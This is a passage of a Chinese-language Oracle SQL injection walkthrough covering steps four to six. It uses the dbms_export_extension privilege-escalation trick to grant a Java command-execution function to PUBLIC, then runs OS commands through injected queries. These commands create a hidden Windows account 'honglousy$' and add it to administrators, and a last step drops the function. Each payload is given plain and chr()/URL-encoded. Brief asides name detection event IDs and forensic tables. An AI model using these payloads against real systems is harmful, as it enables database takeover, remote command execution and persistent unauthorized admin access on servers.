C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(45)%7C%7Cchr(45),chr(83)%7C%7Cchr(89)%7C%7Cchr(83),0,chr(49),0)%20and%201=1 

    ==================================================================================

第四步(把函数 executeCmd 的全部权限授予 PUBLIC):

  and 0=sys.dbms_export_extension.get_domain_index_tables(FOO,BAR,DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''grant all on executeCmd to public'';END;';END;--,SYS,0,1,0) and 1=1

 %20and%200=sys.dbms_export_extension.get_domain_index_tables(chr(70)%7C%7Cchr(79)%7C%7Cchr(79),chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(68)%7C%7Cchr(66)%7C%7Cchr(77)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(34)%7C%7Cchr(46)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(40)%7C%7Cchr(58)%7C%7Cchr(80)%7C%7Cchr(49)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(68)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(76)%7C%7Cchr(65)%7C%7Cchr(82)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(80)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(71)%7C%7Cchr(77)%7C%7Cchr(65)%7C%7Cchr(32)%7C%7Cchr(65)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(79)%7C%7Cchr(77)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(84)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(83)%7C%7Cchr(65)%7C%7Cchr(67)%7C%7Cchr(84)%7C%7Cchr(73)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(59)%7C%7Cchr(66)%7C%7Cchr(69)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(32)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(103)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(116)%7C%7Cchr(32)%7C%7Cchr(97)%7C%7Cchr(108)%7C%7Cchr(108)%7C%7Cchr(32)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(101)%7C%7Cchr(120)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(117)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(67)%7C%7Cchr(109)%7C%7Cchr(100)%7C%7Cchr(32)%7C%7Cchr(116)%7C%7Cchr(111)%7C%7Cchr(32)%7C%7Cchr(112)%7C%7Cchr(117)%7C%7Cchr(98)%7C%7Cchr(108)%7C%7Cchr(105)%7C%7Cchr(99)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cch
r(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(45)%7C%7Cchr(45),chr(83)%7C%7Cchr(89)%7C%7Cchr(83),0,chr(49),0)%20and%201=1 

 =====================================================================================

第五步:

 通过 sys.executecmd(cmd命令) 执行系统命令,这里以 ipconfig 为例

 sys.executecmd(chr(105)%7C%7Cchr(112)%7C%7Cchr(99)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(103))=ipconfig的编码

 and 1=2 union all select chr(94)%7C%7Cchr(94)%7C%7Cchr(94)%7C%7Csys.executecmd(chr(105)%7C%7Cchr(112)%7C%7Cchr(99)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(103))%7C%7Cchr(94)%7C%7Cchr(94)%7C%7Cchr(94),null,null,null  from dual where 1=1 --

(以下两条命令新建本地账户并将其加入 administrators 组;防守方可在 Windows 安全日志中通过事件 4720(创建账户)和 4732(成员加入本地组)发现此类操作。)
net user honglousy$ yanhua /add

 %20and%201=2%20union%20all%20select%20chr(94)%7C%7Cchr(94)%7C%7Cchr(94)%7C%7Csys.executecmd(chr(110)%7C%7Cchr(101)%7C%7Cchr(116)%7C%7Cchr(32)%7C%7Cchr(117)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(114)%7C%7Cchr(32)%7C%7Cchr(104)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(108)%7C%7Cchr(111)%7C%7Cchr(117)%7C%7Cchr(115)%7C%7Cchr(121)%7C%7Cchr(36)%7C%7Cchr(32)%7C%7Cchr(121)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(104)%7C%7Cchr(117)%7C%7Cchr(97)%7C%7Cchr(32)%7C%7Cchr(47)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(100))%7C%7Cchr(94)%7C%7Cchr(94)%7C%7Cchr(94),null,null,null%20%20from%20dual%20where%201=1%20--


net localgroup administrators honglousy$ /add

%20and%201=2%20union%20all%20select%20chr(94)%7C%7Cchr(94)%7C%7Cchr(94)%7C%7Csys.executecmd(chr(110)%7C%7Cchr(101)%7C%7Cchr(116)%7C%7Cchr(32)%7C%7Cchr(108)%7C%7Cchr(111)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(108)%7C%7Cchr(103)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(117)%7C%7Cchr(112)%7C%7Cchr(32)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(109)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(105)%7C%7Cchr(115)%7C%7Cchr(116)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(115)%7C%7Cchr(32)%7C%7Cchr(104)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(103)%7C%7Cchr(108)%7C%7Cchr(111)%7C%7Cchr(117)%7C%7Cchr(115)%7C%7Cchr(121)%7C%7Cchr(36)%7C%7Cchr(32)%7C%7Cchr(47)%7C%7Cchr(97)%7C%7Cchr(100)%7C%7Cchr(100))%7C%7Cchr(94)%7C%7Cchr(94)%7C%7Cchr(94),null,null,null%20%20from%20dual%20where%201=1%20--















======================================================================================

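第六步(删除函数 executeCmd;这一步只删除了该函数,第一步创建的 Java 源 PANGOLIN 和第二步授予 PUBLIC 的 Java 权限不在删除范围内,取证时可在 DBA_OBJECTS(OBJECT_TYPE 为 JAVA SOURCE / JAVA CLASS)和 DBA_JAVA_POLICY 中核查):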

  and 0=sys.dbms_export_extension.get_domain_index_tables(FOO,BAR,DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''drop function executeCmd;'';END;';END;--,SYS,0,1,0) and 1=1

   *******************************************************************************

 %20and%200=sys.dbms_export_extension.get_domain_index_tables(chr(70)%7C%7Cchr(79)%7C%7Cchr(79),chr(66)%7C%7Cchr(65)%7C%7Cchr(82),chr(68)%7C%7Cchr(66)%7C%7Cchr(77)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(34)%7C%7Cchr(46)%7C%7Cchr(80)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(40)%7C%7Cchr(58)%7C%7Cchr(80)%7C%7Cchr(49)%7C%7Cchr(41)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(68)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(76)%7C%7Cchr(65)%7C%7Cchr(82)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(80)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(71)%7C%7Cchr(77)%7C%7Cchr(65)%7C%7Cchr(32)%7C%7Cchr(65)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(79)%7C%7Cchr(77)%7C%7Cchr(79)%7C%7Cchr(85)%7C%7Cchr(83)%7C%7Cchr(95)%7C%7Cchr(84)%7C%7Cchr(82)%7C%7Cchr(65)%7C%7Cchr(78)%7C%7Cchr(83)%7C%7Cchr(65)%7C%7Cchr(67)%7C%7Cchr(84)%7C%7Cchr(73)%7C%7Cchr(79)%7C%7Cchr(78)%7C%7Cchr(59)%7C%7Cchr(66)%7C%7Cchr(69)%7C%7Cchr(71)%7C%7Cchr(73)%7C%7Cchr(78)%7C%7Cchr(32)%7C%7Cchr(69)%7C%7Cchr(88)%7C%7Cchr(69)%7C%7Cchr(67)%7C%7Cchr(85)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(73)%7C%7Cchr(77)%7C%7Cchr(77)%7C%7Cchr(69)%7C%7Cchr(68)%7C%7Cchr(73)%7C%7Cchr(65)%7C%7Cchr(84)%7C%7Cchr(69)%7C%7Cchr(32)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(100)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(112)%7C%7Cchr(32)%7C%7Cchr(102)%7C%7Cchr(117)%7C%7Cchr(110)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(105)%7C%7Cchr(111)%7C%7Cchr(110)%7C%7Cchr(32)%7C%7Cchr(101)%7C%7Cchr(120)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(117)%7C%7Cchr(116)%7C%7Cchr(101)%7C%7Cchr(67)%7C%7Cchr(109)%7C%7Cchr(100)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(59)%7C%7Cchr(39)%7C%7Cchr(59)%7C%7Cchr(69)%7C%7Cchr(78)%7C%7Cchr(68)%7C%7Cchr(5
9)%7C%7Cchr(45)%7C%7Cchr(45),chr(83)%7C%7Cchr(89)%7C%7Cchr(83),0,chr(49),0)%20and%201=1